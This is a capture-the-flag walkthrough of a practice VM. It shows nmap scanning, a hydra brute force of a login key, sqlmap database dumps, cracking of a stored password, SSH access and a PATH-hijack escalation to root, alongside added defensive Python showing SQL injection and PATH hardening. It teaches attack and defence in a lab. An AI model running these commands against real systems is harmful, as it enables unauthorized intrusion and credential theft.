Download VM here.

Run it on VirtualBox, and let’s get started.

0. Get VM’s IP:

  • $ nmap -sn 192.168.1.0/24
    the VM’s IP » 192.168.1.142

1. Enumeration:

Now we can continue to scan the machine and the running services.

  • Using Zenmap (nmap’s GUI), equivalent to: $ nmap -T4 -A -v 192.168.1.142

As you can see, there are:

  • Apache server running on port 80
  • rpcbind on port 111
  • ssh on port 777

2. Web Enumeration:

  • let’s see the web app running on apache

  • let’s discover any directories using dirbuster » found nothing useful

  • let’s inspect and check the picture on the page, maybe something is hidden in it.

    • download it » it’s a gif
    • using the strings command or exiftool » got this string: kzMb5nVYJw

let’s try opening that string as a directory:

  • got this page with login function and needs a key

From its source code it seems that the key isn’t that hard and we can brute force it.

So let’s use hydra for that job; you could use Burp Suite’s Intruder too.

usage: hydra -l <USER> -p <Password> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"
$ hydra 192.168.1.142 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -P /home/sehs/Desktop/stuff/rockyou.txt -la

(here -la is just -l a, a dummy username, since the form only has the key field; -P points at the wordlist and ^PASS^ is where each candidate is inserted)

we got the password » elite

Now let’s login and see

It’s a search function; typing any letters, or just pressing enter, gives you this:

some names from a database

3. Exploitation:

  • let’s check this database and see what we could get, using sqlmap tool:

$ sqlmap -u "http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=" --dbs

And we got these databases.
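The page never shows the PHP behind 420search.php, so what follows is an added example, not the VM’s code: a constructed sqlite3 table with a search function written the way sqlmap proved this one behaves (the usrtosearch value pasted straight into the SQL text) beside the parameterized version that closes the hole. The table contents and the column names are made up for the demo.

```python
import sqlite3

# Constructed sample data standing in for the "seth" database on the VM.
SAMPLE_USERS = [
    (1, "ramses", "ceo"),
    (2, "isis", "dev"),
    (3, "horus", "admin"),
]


def make_db() -> sqlite3.Connection:
    """In-memory database with one table, populated from SAMPLE_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, position TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, usrtosearch: str) -> list:
    """The injectable pattern: request input is concatenated into the query text,
    so quotes and SQL comment markers in the input rewrite the WHERE clause."""
    sql = "SELECT name, position FROM users WHERE name LIKE '%" + usrtosearch + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, usrtosearch: str) -> list:
    """The fix: a bound parameter.  The input is only ever a LIKE pattern value,
    never SQL, whatever characters it contains."""
    sql = "SELECT name, position FROM users WHERE name LIKE ?"
    return conn.execute(sql, ("%" + usrtosearch + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tamper = "' OR 1=1 --"          # turns the WHERE clause into "always true"
    print("normal search   :", search_vulnerable(db, "ram"))
    print("vulnerable+tamper:", search_vulnerable(db, tamper))   # whole table
    print("safe+tamper     :", search_safe(db, tamper))          # no rows
```

With the concatenated query the tampered value returns every row, which is the behaviour sqlmap detects and then automates into full table dumps; with the bound parameter the same string is just a pattern nobody’s name matches.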

  • let’s look into them:
    • mysql

$ sqlmap -u "http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=a" --batch --dump -C User,Password -T user -D mysql

nothing useful here

    • seth

$ sqlmap -u "http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=" --dump --columns --tables -D seth

ramses’ password looks interesting: YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE

  • let’s decode it as base64 (it’s encoding, not encryption, so no key is needed):
    • $ echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= | base64 -d
    • we got this md5 hash: c6d6bd7ebf806f43c76acc3681703b81 » cracking it online gives » omega

Getting back to the ssh service:

  • let’s try this user and his password and see if it works
    • $ ssh ramses@192.168.1.142 -p 777
    • password: omega
  • notice it’s running on port 777, not its default 22

And yeah, we got a connection.

let’s see our privileges here » just a user, not root

let’s roam into the system and see what we could find

we could read his bash history » he had executed a file called procwatch in /var/www/backup

  • so let’s go there and see
  • This file just runs the ps command (process status) inside a shell (sh) to display the running processes.
    • So we have an executable, running with root privileges, that calls ps by its bare name; ps is really just a file in /bin, and $PATH decides which directories are searched for it.

$PATH lists the directories where executables are looked up, in order, so if we manipulate this environment variable we can get procwatch to run sh instead of ps, and that should give us a root shell :D

ramses@NullByte:/var/www/backup$ ln -snf /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH="/var/www/backup:$PATH"

The ln command creates a symlink named ps that points to /bin/sh, and the export puts the current directory at the front of PATH, so procwatch’s call to ps now runs our shell :D
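The same resolution rule, and the invocation procwatch should have used, as an added example that is not the VM’s binary: two constructed directories each hold a tiny ps script, one playing the real /bin/ps and one a writable directory like /var/www/backup. run_vulnerable calls ps by bare name through sh with the caller’s PATH, as procwatch does; run_hardened calls the binary by absolute path with a fixed, minimal environment. untrusted_entries is the audit a defender would run over the PATH a root-running helper inherits. TRUSTED_PATH is an assumed value for the demo.

```python
import os
import subprocess
import tempfile
from typing import List, Optional

TRUSTED_PATH = "/usr/bin:/bin"   # assumed: the most a privileged helper should search


def resolve_command(cmd: str, path_value: str) -> Optional[str]:
    """First executable named cmd along path_value, the way sh resolves a bare name."""
    for entry in path_value.split(os.pathsep):
        candidate = os.path.join(entry or ".", cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def untrusted_entries(path_value: str, trusted: str = TRUSTED_PATH) -> List[str]:
    """PATH entries a root-running helper must not search: empty, relative, or outside trusted."""
    allowed = set(trusted.split(os.pathsep))
    return [e for e in path_value.split(os.pathsep)
            if e == "" or not os.path.isabs(e) or e not in allowed]


def _write_fake(dirname: str, name: str, message: str) -> str:
    """Constructed stand-in for a binary: a script that only prints message."""
    path = os.path.join(dirname, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho %s\n" % message)
    os.chmod(path, 0o755)
    return path


def run_vulnerable(env: dict) -> str:
    """procwatch's pattern: bare command name, caller's PATH decides what runs."""
    return subprocess.run(["/bin/sh", "-c", "ps"], env=env,
                          capture_output=True, text=True, check=True).stdout.strip()


def run_hardened(ps_path: str, trusted: str = TRUSTED_PATH) -> str:
    """Absolute path plus a fixed environment: whatever PATH the caller set is ignored."""
    return subprocess.run(["/bin/sh", "-c", ps_path], env={"PATH": trusted},
                          capture_output=True, text=True, check=True).stdout.strip()


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        trusted_dir = os.path.join(tmp, "bin")
        writable_dir = os.path.join(tmp, "backup")
        os.mkdir(trusted_dir)
        os.mkdir(writable_dir)
        real_ps = _write_fake(trusted_dir, "ps", "real-ps")
        _write_fake(writable_dir, "ps", "hijacked")
        # The environment the helper inherits: writable dir prepended, as on the VM.
        inherited_env = {"PATH": writable_dir + os.pathsep + trusted_dir}
        return {
            "resolves_to": resolve_command("ps", inherited_env["PATH"]),
            "vulnerable_output": run_vulnerable(inherited_env),
            "hardened_output": run_hardened(real_ps, trusted=trusted_dir),
            "flagged": untrusted_entries(inherited_env["PATH"], trusted=trusted_dir),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
    print("audit:", untrusted_entries("/var/www/backup:/usr/bin:/bin"))
```

The hardened call still works when the caller's PATH is poisoned, and the audit flags /var/www/backup before anything is executed; the other usual fix, building setuid helpers so they never invoke a shell at all, is outside this example.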

Got root access :) opening /root/proof.txt » gave us the flag and we are done here…

  • hope you enjoyed…